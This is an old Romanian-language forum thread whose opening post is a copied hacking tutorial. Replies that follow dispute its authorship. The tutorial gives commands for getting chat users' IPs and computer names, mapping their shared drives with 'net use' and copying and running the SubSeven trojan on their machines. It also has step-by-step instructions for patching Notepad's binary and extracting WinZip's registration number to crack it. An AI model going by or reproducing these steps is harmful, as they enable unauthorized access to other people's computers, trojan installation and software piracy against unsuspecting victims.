zbeng Posted June 15, 2006 Report Posted June 15, 2006 Vom folosi niste programe de hack pe care le aveti in windows si nici nu stiti de ele.Puteti lua IP-ul cuiva cu ajutorul comenzii dos c:/windows/tracert -j www.numeserver.Incercati cu c:/windows/tracert -j www.nebunu.home.ro pentru a afla ip-ul meu.Comanda c:/windows/nbtstat -n va va lista toate numele de utilizator din calculatorul dvs iarc:/windows/nbtstat -n www.numeserver va face acelasi lucru cu www.numeserver sau cu IP-ul persoanei dorite cum ar fi c:/windows/nbtstat -n 193.148.458.934.Sa trecem acum la niste smecherii pe care le puteti face pe chat-uri unde sunt toti fraierii.(rog pe Cristi si Edi sa nu se supere pe mine,ei nu fac parte din aceasta categorie.)Presupunem ca un calculator are optiunea "file and print sharing" din optiunea "network"care se gaseste in "control panel" activata.Pentru a scana gazdele vulnerabile folositi programul Legion sau Nbtscan.Daca este asa atunci putem face ce vrem cu calculatorul acelui lamer.Voi intrati pe chat cuprogramul Mirc.Tastati "dns/nickname" pentru a-i la IP-ul apoi urmati succesiunea de comenzi:c:/windows/nbtstat -n IP {IP este adresa de ip a lamerului}Dupa aceasta comanda aflati probabil si numele computerului acelui nefericit.Presupunem ca numeleeste nebunu(nu,nu incercati la mine,eu nu intru pe chat-uri -Tastati "c:/windows/net use f:IPnebunu" si aveti acces la discul f al fraierului!.Sa explicam aceasta comanda:Programul net.exe se gaseste in directorul windows al utilizatorilor de windows 95.IP-adresa lui de ip.f-poate sa fie si c: sau d: ,reprezinta discul la care dorim sa avem acces.nebunu-numele computerului pe care-l aflati cu "c:/winldows/nbtstat -n IP"Sa instalam acum un troian cum ar fi Subseven pe calculatorul lamerului.Dupa ce dati comanda "c:/windows/net use f:IPnebunu" copiati fisieul "server.exe" pe f:"copy server.exe f:" apoi il executati "f:/server.exe".DISTRACTIE PLACUTADaca nu are "file and print sharing" disabled si este utilizator de windows NT atunci puteti creaun disc virtual x: pe care sa puneti troianul."net use x:IPtmpparola_dorita/user:ntwak0"net copy server.exe"C-R-A-C-K-I-N-G ----------------------- N-O-T-E-P-A-DNu va deranjeaza atunci cand deschideti un fisier mai mare de 100k in notepad,si aparemesajul "the file is too large for notepad to open......."????.Haideti sa scapam de acest mesajsi sa intram direct in Wordpad cand ne confruntam cu o astfel de siuatie.1) avem nevoie de programul de dezasamblare w32dasm,de programul Hiew2) cunostinte minime de assembler-dezasamblati programul in w32dasm-activati optiunea "string reference" si cautati sirul "the file is too large..."-veti gasi ceva de genul "string resource ID=00052" -selectati optiunea Function submeniul Import -cautati functia User32.messageboxA(responsabile de casetele de dialog in windows)-dati dublu click pe ea si obtineti ceva de genulcall dword ptr [00407430] {chemarea procedurii de mesaj}cmp eax,0000006{compara registrul eax cu adresa procedurii}jne 00402E19 {daca eax nu este egal cu 0000006 .atunci iese din program pentruca sunt doua optiunila selectarea lui OK se deschide Wordpad iar altfel iese.Celelalte instructiuni nu mai conteza- -selectati cu mouse-ul intstructiunile call si jne si notati adresa lor de ofset-inchideti w32dasm-deschideti Hiew "hiew notepad.exe"-selectati F4 optiunea decode -F5 si scrieti 2161 {adresa primului numar de offset (gasit pentru cmp)}-F3 scrieti 404840484048-F9 pentru a valida introducerea-F5,scrieti numarul pentru jne care este 216A-F3,scrieti 404840484048-F9 pentru a actualiza si Gata!!!Ce dracu' este 404840484048? 40-in hexazecimal inseamna "inc eax" adica adauga 148-inseamna "dec eax" adica scade 190 inseamna NOP adica instructiunea nula(nu face nimic)Asi fi putut la saltul "jne" sa pun NOP dar unele programe nu accepta aceasta instructiuneasa ca am preferat sa execute un ciclu de genul "inc eax"---" dec eax"(pun 1 si apoi iau 1).C-R-A-C-K-I-N-G W-I-N-Z-I-P-deschid winzip si unde mi se cere numarul de inregistrare introduc 66696669-NU tatez Enter!!! Las winzip asa cum este si il deschid in w32dasm ca proces in executie-scanez in programul dezasamblat 66696669 in hexa-ma duc la adresa indicata cum ar fi 00154:FA14569-gasesc ceva de genul:mov al,[edx]cmp al,[esi]jnz 00418956Deci compara numarul meu fals din "al" cu numarul de inregistrare adevarat aflat in memoriein "esi".Treduie sa afisez continutul registrului esi pentru a afla numarul adevarat!!!!tutorial facut de vrajitorul Quote
zbeng Posted June 15, 2006 Author Report Posted June 15, 2006 e de la vrajitorul dacal cunosti :@ da lam mai vazut pe 2 site-uri Quote
YceFire Posted June 15, 2006 Report Posted June 15, 2006 lol :@ , eu ma gandeam la nebunu, si nup nu'l cunosc (din pacate :@ ) Quote
Godfather Posted June 15, 2006 Report Posted June 15, 2006 Tutorialul apartine lui nebunu ! vrajitorul a copiat de la nebunu ! Quote
YceFire Posted June 15, 2006 Report Posted June 15, 2006 i knew it all the time , btw mai este nebunu ???ca cik era in constructie situ !! :@ Quote
Wisa Posted June 17, 2006 Report Posted June 17, 2006 <div class='quotetop'>QUOTE("nos")</div>kw3rln pasta ti l-am adus yo BIne ai facut nos , adu cat de multa lume aici sa ne adunam . Quote